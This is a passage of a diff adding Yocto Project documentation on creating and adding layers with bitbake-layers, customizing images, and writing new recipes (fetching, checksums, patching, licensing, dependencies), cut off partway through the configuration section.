+-  A ``conf`` subdirectory that contains a ``layer.conf`` file.
+
+-  A ``recipes-example`` subdirectory that contains a further
+   subdirectory named ``example``, which contains an ``example.bb``
+   recipe file.
+
+-  A ``COPYING.MIT``, which is the license statement for the layer. The
+   script assumes you want to use the MIT license, which is typical for
+   most layers, for the contents of the layer itself.
+
+-  A ``README`` file, which is a file describing the contents of your
+   new layer.
+
+In its simplest form, you can use the following command form to create a
+layer. The command creates a layer whose name corresponds to
+"your_layer_name" in the current directory:
+::
+
+   $ bitbake-layers create-layer your_layer_name
+
+As an example, the following command creates a layer named ``meta-scottrif``
+in your home directory:
+::
+
+   $ cd /usr/home
+   $ bitbake-layers create-layer meta-scottrif
+   NOTE: Starting bitbake server...
+   Add your new layer with 'bitbake-layers add-layer meta-scottrif'
+
+If you want to set the priority of the layer to other than the default
+value of "6", you can either use the ``--priority`` option or you
+can edit the
+:term:`BBFILE_PRIORITY` value
+in the ``conf/layer.conf`` after the script creates it. Furthermore, if
+you want to give the example recipe file some name other than the
+default, you can use the ``--example-recipe-name`` option.
+
+The easiest way to see how the ``bitbake-layers create-layer`` command
+works is to experiment with the script. You can also read the usage
+information by entering the following:
+::
+
+   $ bitbake-layers create-layer --help
+   NOTE: Starting bitbake server...
+   usage: bitbake-layers create-layer [-h] [--priority PRIORITY]
+                                      [--example-recipe-name EXAMPLERECIPE]
+                                      layerdir
+
+   Create a basic layer
+
+   positional arguments:
+     layerdir              Layer directory to create
+
+   optional arguments:
+     -h, --help            show this help message and exit
+     --priority PRIORITY, -p PRIORITY
+                           Layer directory to create
+     --example-recipe-name EXAMPLERECIPE, -e EXAMPLERECIPE
+                           Filename of the example recipe
+
+Adding a Layer Using the ``bitbake-layers`` Script
+--------------------------------------------------
+
+Once you create your general layer, you must add it to your
+``bblayers.conf`` file. Adding the layer to this configuration file
+makes the OpenEmbedded build system aware of your layer so that it can
+search it for metadata.
+
+Add your layer by using the ``bitbake-layers add-layer`` command:
+::
+
+   $ bitbake-layers add-layer your_layer_name
+
+Here is an example that adds a
+layer named ``meta-scottrif`` to the configuration file. Following the
+command that adds the layer is another ``bitbake-layers`` command that
+shows the layers that are in your ``bblayers.conf`` file:
+::
+
+   $ bitbake-layers add-layer meta-scottrif
+   NOTE: Starting bitbake server...
+   Parsing recipes: 100% |##########################################################| Time: 0:00:49
+   Parsing of 1441 .bb files complete (0 cached, 1441 parsed). 2055 targets, 56 skipped, 0 masked, 0 errors.
+   $ bitbake-layers show-layers
+   NOTE: Starting bitbake server...
+   layer                 path                                      priority
+   ==========================================================================
+   meta                  /home/scottrif/poky/meta                  5
+   meta-poky             /home/scottrif/poky/meta-poky             5
+   meta-yocto-bsp        /home/scottrif/poky/meta-yocto-bsp        5
+   workspace             /home/scottrif/poky/build/workspace       99
+   meta-scottrif         /home/scottrif/poky/build/meta-scottrif   6
+
+
+Adding the layer to this file
+enables the build system to locate the layer during the build.
+
+.. note::
+
+   During a build, the OpenEmbedded build system looks in the layers
+   from the top of the list down to the bottom in that order.
+
+.. _usingpoky-extend-customimage:
+
+Customizing Images
+==================
+
+You can customize images to satisfy particular requirements. This
+section describes several methods and provides guidelines for each.
+
+.. _usingpoky-extend-customimage-localconf:
+
+Customizing Images Using ``local.conf``
+---------------------------------------
+
+Probably the easiest way to customize an image is to add a package by
+way of the ``local.conf`` configuration file. Because it is limited to
+local use, this method generally only allows you to add packages and is
+not as flexible as creating your own customized image. When you add
+packages using local variables this way, you need to realize that these
+variable changes are in effect for every build and consequently affect
+all images, which might not be what you require.
+
+To add a package to your image using the local configuration file, use
+the ``IMAGE_INSTALL`` variable with the ``_append`` operator:
+::
+
+   IMAGE_INSTALL_append = " strace"
+
+Use of the syntax is important -
+specifically, the space between the quote and the package name, which is
+``strace`` in this example. This space is required since the ``_append``
+operator does not add the space.
+
+Furthermore, you must use ``_append`` instead of the ``+=`` operator if
+you want to avoid ordering issues. The reason for this is because doing
+so unconditionally appends to the variable and avoids ordering problems
+due to the variable being set in image recipes and ``.bbclass`` files
+with operators like ``?=``. Using ``_append`` ensures the operation
+takes effect.
+
+As shown in its simplest use, ``IMAGE_INSTALL_append`` affects all
+images. It is possible to extend the syntax so that the variable applies
+to a specific image only. Here is an example:
+::
+
+   IMAGE_INSTALL_append_pn-core-image-minimal = " strace"
+
+This example adds ``strace`` to the ``core-image-minimal`` image only.
+
+You can add packages using a similar approach through the
+``CORE_IMAGE_EXTRA_INSTALL`` variable. If you use this variable, only
+``core-image-*`` images are affected.
+
+.. _usingpoky-extend-customimage-imagefeatures:
+
+Customizing Images Using Custom ``IMAGE_FEATURES`` and ``EXTRA_IMAGE_FEATURES``
+-------------------------------------------------------------------------------
+
+Another method for customizing your image is to enable or disable
+high-level image features by using the
+:term:`IMAGE_FEATURES` and
+:term:`EXTRA_IMAGE_FEATURES`
+variables. Although the functions for both variables are nearly
+equivalent, best practices dictate using ``IMAGE_FEATURES`` from within
+a recipe and using ``EXTRA_IMAGE_FEATURES`` from within your
+``local.conf`` file, which is found in the
+:term:`Build Directory`.
+
+To understand how these features work, the best reference is
+``meta/classes/core-image.bbclass``. This class lists out the available
+``IMAGE_FEATURES`` of which most map to package groups while some, such
+as ``debug-tweaks`` and ``read-only-rootfs``, resolve as general
+configuration settings.
+
+In summary, the file looks at the contents of the ``IMAGE_FEATURES``
+variable and then maps or configures the feature accordingly. Based on
+this information, the build system automatically adds the appropriate
+packages or configurations to the
+:term:`IMAGE_INSTALL` variable.
+Effectively, you are enabling extra features by extending the class or
+creating a custom class for use with specialized image ``.bb`` files.
+
+Use the ``EXTRA_IMAGE_FEATURES`` variable from within your local
+configuration file. Using a separate area from which to enable features
+with this variable helps you avoid overwriting the features in the image
+recipe that are enabled with ``IMAGE_FEATURES``. The value of
+``EXTRA_IMAGE_FEATURES`` is added to ``IMAGE_FEATURES`` within
+``meta/conf/bitbake.conf``.
+
+To illustrate how you can use these variables to modify your image,
+consider an example that selects the SSH server. The Yocto Project ships
+with two SSH servers you can use with your images: Dropbear and OpenSSH.
+Dropbear is a minimal SSH server appropriate for resource-constrained
+environments, while OpenSSH is a well-known standard SSH server
+implementation. By default, the ``core-image-sato`` image is configured
+to use Dropbear. The ``core-image-full-cmdline`` and ``core-image-lsb``
+images both include OpenSSH. The ``core-image-minimal`` image does not
+contain an SSH server.
+
+You can customize your image and change these defaults. Edit the
+``IMAGE_FEATURES`` variable in your recipe or use the
+``EXTRA_IMAGE_FEATURES`` in your ``local.conf`` file so that it
+configures the image you are working with to include
+``ssh-server-dropbear`` or ``ssh-server-openssh``.
+
+.. note::
+
+   See the ":ref:`ref-manual/ref-features:image features`" section in the Yocto
+   Project Reference Manual for a complete list of image features that ship
+   with the Yocto Project.
+
+.. _usingpoky-extend-customimage-custombb:
+
+Customizing Images Using Custom .bb Files
+-----------------------------------------
+
+You can also customize an image by creating a custom recipe that defines
+additional software as part of the image. The following example shows
+the form for the two lines you need:
+::
+
+   IMAGE_INSTALL = "packagegroup-core-x11-base package1 package2"
+   inherit core-image
+
+Defining the software using a custom recipe gives you total control over
+the contents of the image. It is important to use the correct names of
+packages in the ``IMAGE_INSTALL`` variable. You must use the
+OpenEmbedded notation and not the Debian notation for the names (e.g.
+``glibc-dev`` instead of ``libc6-dev``).
+
+The other method for creating a custom image is to base it on an
+existing image. For example, if you want to create an image based on
+``core-image-sato`` but add the additional package ``strace`` to the
+image, copy the ``meta/recipes-sato/images/core-image-sato.bb`` to a new
+``.bb`` and add the following line to the end of the copy:
+::
+
+   IMAGE_INSTALL += "strace"
+
+.. _usingpoky-extend-customimage-customtasks:
+
+Customizing Images Using Custom Package Groups
+----------------------------------------------
+
+For complex custom images, the best approach for customizing an image is
+to create a custom package group recipe that is used to build the image
+or images. A good example of a package group recipe is
+``meta/recipes-core/packagegroups/packagegroup-base.bb``.
+
+If you examine that recipe, you see that the ``PACKAGES`` variable lists
+the package group packages to produce. The ``inherit packagegroup``
+statement sets appropriate default values and automatically adds
+``-dev``, ``-dbg``, and ``-ptest`` complementary packages for each
+package specified in the ``PACKAGES`` statement.
+
+.. note::
+
+   The ``inherit packagegroup`` line should be located near the top of the
+   recipe, certainly before the ``PACKAGES`` statement.
+
+For each package you specify in ``PACKAGES``, you can use ``RDEPENDS``
+and ``RRECOMMENDS`` entries to provide a list of packages the parent
+task package should contain. You can see examples of these further down
+in the ``packagegroup-base.bb`` recipe.
+
+Here is a short, fabricated example showing the same basic pieces for a
+hypothetical packagegroup defined in ``packagegroup-custom.bb``, where
+the variable ``PN`` is the standard way to abbreviate the reference to
+the full packagegroup name ``packagegroup-custom``:
+::
+
+   DESCRIPTION = "My Custom Package Groups"
+
+   inherit packagegroup
+
+   PACKAGES = "\
+       ${PN}-apps \
+       ${PN}-tools \
+       "
+
+   RDEPENDS_${PN}-apps = "\
+       dropbear \
+       portmap \
+       psplash"
+
+   RDEPENDS_${PN}-tools = "\
+       oprofile \
+       oprofileui-server \
+       lttng-tools"
+
+   RRECOMMENDS_${PN}-tools = "\
+       kernel-module-oprofile"
+
+In the previous example, two package group packages are created with
+their dependencies and their recommended package dependencies listed:
+``packagegroup-custom-apps``, and ``packagegroup-custom-tools``. To
+build an image using these package group packages, you need to add
+``packagegroup-custom-apps`` and/or ``packagegroup-custom-tools`` to
+``IMAGE_INSTALL``. For other forms of image dependencies see the other
+areas of this section.
+
+.. _usingpoky-extend-customimage-image-name:
+
+Customizing an Image Hostname
+-----------------------------
+
+By default, the configured hostname (i.e. ``/etc/hostname``) in an image
+is the same as the machine name. For example, if
+:term:`MACHINE` equals "qemux86", the
+configured hostname written to ``/etc/hostname`` is "qemux86".
+
+You can customize this name by altering the value of the "hostname"
+variable in the ``base-files`` recipe using either an append file or a
+configuration file. Use the following in an append file:
+::
+
+   hostname = "myhostname"
+
+Use the following in a configuration file:
+::
+
+   hostname_pn-base-files = "myhostname"
+
+Changing the default value of the variable "hostname" can be useful in
+certain situations. For example, suppose you need to do extensive
+testing on an image and you would like to easily identify the image
+under test from existing images with typical default hostnames. In this
+situation, you could change the default hostname to "testme", which
+results in all the images using the name "testme". Once testing is
+complete and you do not need to rebuild the image for test any longer,
+you can easily reset the default hostname.
+
+Another point of interest is that if you unset the variable, the image
+will have no default hostname in the filesystem. Here is an example that
+unsets the variable in a configuration file:
+::
+
+  hostname_pn-base-files = ""
+
+Having no default hostname in the filesystem is suitable for
+environments that use dynamic hostnames such as virtual machines.
+
+.. _new-recipe-writing-a-new-recipe:
+
+Writing a New Recipe
+====================
+
+Recipes (``.bb`` files) are fundamental components in the Yocto Project
+environment. Each software component built by the OpenEmbedded build
+system requires a recipe to define the component. This section describes
+how to create, write, and test a new recipe.
+
+.. note::
+
+   For information on variables that are useful for recipes and for
+   information about recipe naming issues, see the
+   ":ref:`ref-manual/ref-varlocality:recipes`" section of the Yocto Project
+   Reference Manual.
+
+.. _new-recipe-overview:
+
+Overview
+--------
+
+The following figure shows the basic process for creating a new recipe.
+The remainder of the section provides details for the steps.
+
+.. image:: figures/recipe-workflow.png
+   :align: center
+
+.. _new-recipe-locate-or-automatically-create-a-base-recipe:
+
+Locate or Automatically Create a Base Recipe
+--------------------------------------------
+
+You can always write a recipe from scratch. However, three choices exist
+that can help you quickly get a start on a new recipe:
+
+-  ``devtool add``: A command that assists in creating a recipe and an
+   environment conducive to development.
+
+-  ``recipetool create``: A command provided by the Yocto Project that
+   automates creation of a base recipe based on the source files.
+
+-  *Existing Recipes:* Location and modification of an existing recipe
+   that is similar in function to the recipe you need.
+
+.. note::
+
+   For information on recipe syntax, see the
+   ":ref:`dev-manual/dev-manual-common-tasks:recipe syntax`" section.
+
+.. _new-recipe-creating-the-base-recipe-using-devtool:
+
+Creating the Base Recipe Using ``devtool add``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The ``devtool add`` command uses the same logic for auto-creating the
+recipe as ``recipetool create``, which is listed below. Additionally,
+however, ``devtool add`` sets up an environment that makes it easy for
+you to patch the source and to make changes to the recipe as is often
+necessary when adding a recipe to build a new piece of software to be
+included in a build.
+
+You can find a complete description of the ``devtool add`` command in
+the ":ref:`sdk-a-closer-look-at-devtool-add`" section
+in the Yocto Project Application Development and the Extensible Software
+Development Kit (eSDK) manual.
+
+.. _new-recipe-creating-the-base-recipe-using-recipetool:
+
+Creating the Base Recipe Using ``recipetool create``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+``recipetool create`` automates creation of a base recipe given a set of
+source code files. As long as you can extract or point to the source
+files, the tool will construct a recipe and automatically configure all
+pre-build information into the recipe. For example, suppose you have an
+application that builds using Autotools. Creating the base recipe using
+``recipetool`` results in a recipe that has the pre-build dependencies,
+license requirements, and checksums configured.
+
+To run the tool, you just need to be in your
+:term:`Build Directory` and have sourced the
+build environment setup script (i.e.
+:ref:`structure-core-script`).
+To get help on the tool, use the following command:
+::
+
+   $ recipetool -h
+   NOTE: Starting bitbake server...
+   usage: recipetool [-d] [-q] [--color COLOR] [-h] <subcommand> ...
+
+   OpenEmbedded recipe tool
+
+   options:
+     -d, --debug     Enable debug output
+     -q, --quiet     Print only errors
+     --color COLOR   Colorize output (where COLOR is auto, always, never)
+     -h, --help      show this help message and exit
+
+   subcommands:
+     create          Create a new recipe
+     newappend       Create a bbappend for the specified target in the specified
+                       layer
+     setvar          Set a variable within a recipe
+     appendfile      Create/update a bbappend to replace a target file
+     appendsrcfiles  Create/update a bbappend to add or replace source files
+     appendsrcfile   Create/update a bbappend to add or replace a source file
+   Use recipetool <subcommand> --help to get help on a specific command
+
+Running ``recipetool create -o OUTFILE`` creates the base recipe and
+locates it properly in the layer that contains your source files.
+Following are some syntax examples:
+
+ - Use this syntax to generate a recipe based on source. Once generated,
+   the recipe resides in the existing source code layer:
+   ::
+
+      recipetool create -o OUTFILE source
+
+ - Use this syntax to generate a recipe using code that
+   you extract from source. The extracted code is placed in its own layer
+   defined by ``EXTERNALSRC``.
+   ::
+
+      recipetool create -o OUTFILE -x EXTERNALSRC source
+
+ - Use this syntax to generate a recipe based on source. The options
+   direct ``recipetool`` to generate debugging information. Once generated,
+   the recipe resides in the existing source code layer:
+   ::
+
+      recipetool create -d -o OUTFILE source
+
+.. _new-recipe-locating-and-using-a-similar-recipe:
+
+Locating and Using a Similar Recipe
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Before writing a recipe from scratch, it is often useful to discover
+whether someone else has already written one that meets (or comes close
+to meeting) your needs. The Yocto Project and OpenEmbedded communities
+maintain many recipes that might be candidates for what you are doing.
+You can find a good central index of these recipes in the `OpenEmbedded
+Layer Index <https://layers.openembedded.org>`__.
+
+Working from an existing recipe or a skeleton recipe is the best way to
+get started. Here are some points on both methods:
+
+-  *Locate and modify a recipe that is close to what you want to do:*
+   This method works when you are familiar with the current recipe
+   space. The method does not work so well for those new to the Yocto
+   Project or writing recipes.
+
+   Some risks associated with this method are using a recipe that has
+   areas totally unrelated to what you are trying to accomplish with
+   your recipe, not recognizing areas of the recipe that you might have
+   to add from scratch, and so forth. All these risks stem from
+   unfamiliarity with the existing recipe space.
+
+-  *Use and modify the following skeleton recipe:* If for some reason
+   you do not want to use ``recipetool`` and you cannot find an existing
+   recipe that is close to meeting your needs, you can use the following
+   structure to provide the fundamental areas of a new recipe.
+   ::
+
+      DESCRIPTION = ""
+      HOMEPAGE = ""
+      LICENSE = ""
+      SECTION = ""
+      DEPENDS = ""
+      LIC_FILES_CHKSUM = ""
+
+      SRC_URI = ""
+
+.. _new-recipe-storing-and-naming-the-recipe:
+
+Storing and Naming the Recipe
+-----------------------------
+
+Once you have your base recipe, you should put it in your own layer and
+name it appropriately. Locating it correctly ensures that the
+OpenEmbedded build system can find it when you use BitBake to process
+the recipe.
+
+-  *Storing Your Recipe:* The OpenEmbedded build system locates your
+   recipe through the layer's ``conf/layer.conf`` file and the
+   :term:`BBFILES` variable. This
+   variable sets up a path from which the build system can locate
+   recipes. Here is the typical use:
+   ::
+
+      BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
+                  ${LAYERDIR}/recipes-*/*/*.bbappend"
+
+   Consequently, you need to be sure you locate your new recipe inside
+   your layer such that it can be found.
+
+   You can find more information on how layers are structured in the
+   "`Understanding and Creating
+   Layers <#understanding-and-creating-layers>`__" section.
+
+-  *Naming Your Recipe:* When you name your recipe, you need to follow
+   this naming convention:
+   ::
+
+      basename_version.bb
+
+   Use lower-cased characters and do not include the reserved suffixes
+   ``-native``, ``-cross``, ``-initial``, or ``-dev`` casually (i.e. do not use
+   them as part of your recipe name unless the string applies). Here are some
+   examples:
+
+   .. code-block:: none
+
+      cups_1.7.0.bb
+      gawk_4.0.2.bb
+      irssi_0.8.16-rc1.bb
+
+.. _new-recipe-running-a-build-on-the-recipe:
+
+Running a Build on the Recipe
+-----------------------------
+
+Creating a new recipe is usually an iterative process that requires
+using BitBake to process the recipe multiple times in order to
+progressively discover and add information to the recipe file.
+
+Assuming you have sourced the build environment setup script (i.e.
+:ref:`structure-core-script`) and you are in
+the :term:`Build Directory`, use
+BitBake to process your recipe. All you need to provide is the
+``basename`` of the recipe as described in the previous section:
+::
+
+   $ bitbake basename
+
+During the build, the OpenEmbedded build system creates a temporary work
+directory for each recipe
+(``${``\ :term:`WORKDIR`\ ``}``)
+where it keeps extracted source files, log files, intermediate
+compilation and packaging files, and so forth.
+
+The path to the per-recipe temporary work directory depends on the
+context in which it is being built. The quickest way to find this path
+is to have BitBake return it by running the following:
+::
+
+   $ bitbake -e basename | grep ^WORKDIR=
+
+As an example, assume a Source Directory
+top-level folder named ``poky``, a default Build Directory at
+``poky/build``, and a ``qemux86-poky-linux`` machine target system.
+Furthermore, suppose your recipe is named ``foo_1.3.0.bb``. In this
+case, the work directory the build system uses to build the package
+would be as follows:
+::
+
+   poky/build/tmp/work/qemux86-poky-linux/foo/1.3.0-r0
+
+Inside this directory you can find sub-directories such as ``image``,
+``packages-split``, and ``temp``. After the build, you can examine these
+to determine how well the build went.
+
+.. note::
+
+   You can find log files for each task in the recipe's ``temp``
+   directory (e.g. ``poky/build/tmp/work/qemux86-poky-linux/foo/1.3.0-r0/temp``).
+   Log files are named ``log.taskname`` (e.g. ``log.do_configure``,
+   ``log.do_fetch``, and ``log.do_compile``).
+
+You can find more information about the build process in
+":doc:`../overview-manual/overview-manual-development-environment`"
+chapter of the Yocto Project Overview and Concepts Manual.
+
+.. _new-recipe-fetching-code:
+
+Fetching Code
+-------------
+
+The first thing your recipe must do is specify how to fetch the source
+files. Fetching is controlled mainly through the
+:term:`SRC_URI` variable. Your recipe
+must have a ``SRC_URI`` variable that points to where the source is
+located. For a graphical representation of source locations, see the
+":ref:`sources-dev-environment`" section in
+the Yocto Project Overview and Concepts Manual.
+
+The :ref:`ref-tasks-fetch` task uses
+the prefix of each entry in the ``SRC_URI`` variable value to determine
+which :ref:`fetcher <bitbake:bb-fetchers>` to use to get your
+source files. It is the ``SRC_URI`` variable that triggers the fetcher.
+The :ref:`ref-tasks-patch` task uses
+the variable after source is fetched to apply patches. The OpenEmbedded
+build system uses
+:term:`FILESOVERRIDES` for
+scanning directory locations for local files in ``SRC_URI``.
+
+The ``SRC_URI`` variable in your recipe must define each unique location
+for your source files. It is good practice to not hard-code version
+numbers in a URL used in ``SRC_URI``. Rather than hard-code these
+values, use ``${``\ :term:`PV`\ ``}``,
+which causes the fetch process to use the version specified in the
+recipe filename. Specifying the version in this manner means that
+upgrading the recipe to a future version is as simple as renaming the
+recipe to match the new version.
+
+Here is a simple example from the
+``meta/recipes-devtools/strace/strace_5.5.bb`` recipe where the source
+comes from a single tarball. Notice the use of the
+:term:`PV` variable:
+::
+
+   SRC_URI = "https://strace.io/files/${PV}/strace-${PV}.tar.xz \
+
+Files mentioned in ``SRC_URI`` whose names end in a typical archive
+extension (e.g. ``.tar``, ``.tar.gz``, ``.tar.bz2``, ``.zip``, and so
+forth), are automatically extracted during the
+:ref:`ref-tasks-unpack` task. For
+another example that specifies these types of files, see the
+"`Autotooled Package <#new-recipe-autotooled-package>`__" section.
+
+Another way of specifying source is from an SCM. For Git repositories,
+you must specify :term:`SRCREV` and
+you should specify :term:`PV` to include
+the revision with :term:`SRCPV`. Here
+is an example from the recipe
+``meta/recipes-kernel/blktrace/blktrace_git.bb``:
+::
+
+   SRCREV = "d6918c8832793b4205ed3bfede78c2f915c23385"
+
+   PR = "r6"
+   PV = "1.0.5+git${SRCPV}"
+
+   SRC_URI = "git://git.kernel.dk/blktrace.git \
+              file://ldflags.patch"
+
+If your ``SRC_URI`` statement includes URLs pointing to individual files
+fetched from a remote server other than a version control system,
+BitBake attempts to verify the files against checksums defined in your
+recipe to ensure they have not been tampered with or otherwise modified
+since the recipe was written. Two checksums are used:
+``SRC_URI[md5sum]`` and ``SRC_URI[sha256sum]``.
+
+If your ``SRC_URI`` variable points to more than a single URL (excluding
+SCM URLs), you need to provide the ``md5`` and ``sha256`` checksums for
+each URL. For these cases, you provide a name for each URL as part of
+the ``SRC_URI`` and then reference that name in the subsequent checksum
+statements. Here is an example combining lines from the files
+``git.inc`` and ``git_2.24.1.bb``:
+::
+
+   SRC_URI = "${KERNELORG_MIRROR}/software/scm/git/git-${PV}.tar.gz;name=tarball \
+              ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages"
+
+   SRC_URI[tarball.md5sum] = "166bde96adbbc11c8843d4f8f4f9811b"
+   SRC_URI[tarball.sha256sum] = "ad5334956301c86841eb1e5b1bb20884a6bad89a10a6762c958220c7cf64da02"
+   SRC_URI[manpages.md5sum] = "31c2272a8979022497ba3d4202df145d"
+   SRC_URI[manpages.sha256sum] = "9a7ae3a093bea39770eb96ca3e5b40bff7af0b9f6123f089d7821d0e5b8e1230"
+
+Proper values for ``md5`` and ``sha256`` checksums might be available
+with other signatures on the download page for the upstream source (e.g.
+``md5``, ``sha1``, ``sha256``, ``GPG``, and so forth). Because the
+OpenEmbedded build system only deals with ``sha256sum`` and ``md5sum``,
+you should verify all the signatures you find by hand.
+
+If no ``SRC_URI`` checksums are specified when you attempt to build the
+recipe, or you provide an incorrect checksum, the build will produce an
+error for each missing or incorrect checksum. As part of the error
+message, the build system provides the checksum string corresponding to
+the fetched file. Once you have the correct checksums, you can copy and
+paste them into your recipe and then run the build again to continue.
+
+.. note::
+
+   As mentioned, if the upstream source provides signatures for
+   verifying the downloaded source code, you should verify those
+   manually before setting the checksum values in the recipe and
+   continuing with the build.
+
+This final example is a bit more complicated and is from the
+``meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.20.bb`` recipe. The
+example's ``SRC_URI`` statement identifies multiple files as the source
+files for the recipe: a tarball, a patch file, a desktop file, and an
+icon.
+::
+
+   SRC_URI = "http://dist.schmorp.de/rxvt-unicode/Attic/rxvt-unicode-${PV}.tar.bz2 \
+              file://xwc.patch \
+              file://rxvt.desktop \
+              file://rxvt.png"
+
+When you specify local files using the ``file://`` URI protocol, the
+build system fetches files from the local machine. The path is relative
+to the :term:`FILESPATH` variable
+and searches specific directories in a certain order:
+``${``\ :term:`BP`\ ``}``,
+``${``\ :term:`BPN`\ ``}``, and
+``files``. The directories are assumed to be subdirectories of the
+directory in which the recipe or append file resides. For another
+example that specifies these types of files, see the "`Single .c File
+Package (Hello
+World!) <#new-recipe-single-c-file-package-hello-world>`__" section.
+
+The previous example also specifies a patch file. Patch files are files
+whose names usually end in ``.patch`` or ``.diff`` but can end with
+compressed suffixes such as ``diff.gz`` and ``patch.bz2``, for example.
+The build system automatically applies patches as described in the
+"`Patching Code <#new-recipe-patching-code>`__" section.
+
+.. _new-recipe-unpacking-code:
+
+Unpacking Code
+--------------
+
+During the build, the
+:ref:`ref-tasks-unpack` task unpacks
+the source with ``${``\ :term:`S`\ ``}``
+pointing to where it is unpacked.
+
+If you are fetching your source files from an upstream source archived
+tarball and the tarball's internal structure matches the common
+convention of a top-level subdirectory named
+``${``\ :term:`BPN`\ ``}-${``\ :term:`PV`\ ``}``,
+then you do not need to set ``S``. However, if ``SRC_URI`` specifies to
+fetch source from an archive that does not use this convention, or from
+an SCM like Git or Subversion, your recipe needs to define ``S``.
+
+If processing your recipe using BitBake successfully unpacks the source
+files, you need to be sure that the directory pointed to by ``${S}``
+matches the structure of the source.
+
+.. _new-recipe-patching-code:
+
+Patching Code
+-------------
+
+Sometimes it is necessary to patch code after it has been fetched. Any
+files mentioned in ``SRC_URI`` whose names end in ``.patch`` or
+``.diff`` or compressed versions of these suffixes (e.g. ``diff.gz`` are
+treated as patches. The
+:ref:`ref-tasks-patch` task
+automatically applies these patches.
+
+The build system should be able to apply patches with the "-p1" option
+(i.e. one directory level in the path will be stripped off). If your
+patch needs to have more directory levels stripped off, specify the
+number of levels using the "striplevel" option in the ``SRC_URI`` entry
+for the patch. Alternatively, if your patch needs to be applied in a
+specific subdirectory that is not specified in the patch file, use the
+"patchdir" option in the entry.
+
+As with all local files referenced in
+:term:`SRC_URI` using ``file://``,
+you should place patch files in a directory next to the recipe either
+named the same as the base name of the recipe
+(:term:`BP` and
+:term:`BPN`) or "files".
+
+.. _new-recipe-licensing:
+
+Licensing
+---------
+
+Your recipe needs to have both the
+:term:`LICENSE` and
+:term:`LIC_FILES_CHKSUM`
+variables:
+
+-  ``LICENSE``: This variable specifies the license for the software.
+   If you do not know the license under which the software you are
+   building is distributed, you should go to the source code and look
+   for that information. Typical files containing this information
+   include ``COPYING``, ``LICENSE``, and ``README`` files. You could
+   also find the information near the top of a source file. For example,
+   given a piece of software licensed under the GNU General Public
+   License version 2, you would set ``LICENSE`` as follows:
+   ::
+
+      LICENSE = "GPLv2"
+
+   The licenses you specify within ``LICENSE`` can have any name as long
+   as you do not use spaces, since spaces are used as separators between
+   license names. For standard licenses, use the names of the files in
+   ``meta/files/common-licenses/`` or the ``SPDXLICENSEMAP`` flag names
+   defined in ``meta/conf/licenses.conf``.
+
+-  ``LIC_FILES_CHKSUM``: The OpenEmbedded build system uses this
+   variable to make sure the license text has not changed. If it has,
+   the build produces an error and it affords you the chance to figure
+   it out and correct the problem.
+
+   You need to specify all applicable licensing files for the software.
+   At the end of the configuration step, the build process will compare
+   the checksums of the files to be sure the text has not changed. Any
+   differences result in an error with the message containing the
+   current checksum. For more explanation and examples of how to set the
+   ``LIC_FILES_CHKSUM`` variable, see the
+   ":ref:`dev-manual/dev-manual-common-tasks:tracking license changes`" section.
+
+   To determine the correct checksum string, you can list the
+   appropriate files in the ``LIC_FILES_CHKSUM`` variable with incorrect
+   md5 strings, attempt to build the software, and then note the
+   resulting error messages that will report the correct md5 strings.
+   See the "`Fetching Code <#new-recipe-fetching-code>`__" section for
+   additional information.
+
+   Here is an example that assumes the software has a ``COPYING`` file:
+   ::
+
+      LIC_FILES_CHKSUM = "file://COPYING;md5=xxx"
+
+   When you try to build the
+   software, the build system will produce an error and give you the
+   correct string that you can substitute into the recipe file for a
+   subsequent build.
+
+.. _new-dependencies:
+
+Dependencies
+------------
+
+Most software packages have a short list of other packages that they
+require, which are called dependencies. These dependencies fall into two
+main categories: build-time dependencies, which are required when the
+software is built; and runtime dependencies, which are required to be
+installed on the target in order for the software to run.
+
+Within a recipe, you specify build-time dependencies using the
+:term:`DEPENDS` variable. Although
+nuances exist, items specified in ``DEPENDS`` should be names of other
+recipes. It is important that you specify all build-time dependencies
+explicitly.
+
+Another consideration is that configure scripts might automatically
+check for optional dependencies and enable corresponding functionality
+if those dependencies are found. If you wish to make a recipe that is
+more generally useful (e.g. publish the recipe in a layer for others to
+use), instead of hard-disabling the functionality, you can use the
+:term:`PACKAGECONFIG` variable to allow functionality and the
+corresponding dependencies to be enabled and disabled easily by other
+users of the recipe.
+
+Similar to build-time dependencies, you specify runtime dependencies
+through a variable -
+:term:`RDEPENDS`, which is
+package-specific. All variables that are package-specific need to have
+the name of the package added to the end as an override. Since the main
+package for a recipe has the same name as the recipe, and the recipe's
+name can be found through the
+``${``\ :term:`PN`\ ``}`` variable, then
+you specify the dependencies for the main package by setting
+``RDEPENDS_${PN}``. If the package were named ``${PN}-tools``, then you
+would set ``RDEPENDS_${PN}-tools``, and so forth.
+
+Some runtime dependencies will be set automatically at packaging time.
+These dependencies include any shared library dependencies (i.e. if a
+package "example" contains "libexample" and another package "mypackage"
+contains a binary that links to "libexample" then the OpenEmbedded build
+system will automatically add a runtime dependency to "mypackage" on
+"example"). See the
+":ref:`overview-manual/overview-manual-concepts:automatically added runtime dependencies`"
+section in the Yocto Project Overview and Concepts Manual for further
+details.
+
+.. _new-recipe-configuring-the-recipe:
+
+Configuring the Recipe
+----------------------
+
+Most software provides some means of setting build-time configuration
+options before compilation. Typically, setting these options is
+accomplished by running a configure script with options, or by modifying
+a build configuration file.
+
+.. note::
+
+   As of Yocto Project Release 1.7, some of the core recipes that
+   package binary configuration scripts now disable the scripts due to
+   the scripts previously requiring error-prone path substitution. The
+   OpenEmbedded build system uses ``pkg-config`` now, which is much more
+   robust. You can find a list of the ``*-config`` scripts that are disabled
+   in the ":ref:`migration-1.7-binary-configuration-scripts-disabled`" section
+   in the Yocto Project Reference Manual.
+
+A major part of build-time configuration is about checking for
+build-time dependencies and possibly enabling optional functionality as
+a result. You need to specify any build-time dependencies for the
+software you are building in your recipe's
+:term:`DEPENDS` value, in terms of
+other recipes that satisfy those dependencies. You can often find
+build-time or runtime dependencies described in the software's
+documentation.
+
+The following list provides configuration items of note based on how
+your software is built:
+
+-  *Autotools:* If your source files have a ``configure.ac`` file, then
+   your software is built using Autotools. If this is the case, you just
+   need to worry about modifying the configuration.
+
+   When using Autotools, your recipe needs to inherit the
+   :ref:`autotools <ref-classes-autotools>` class
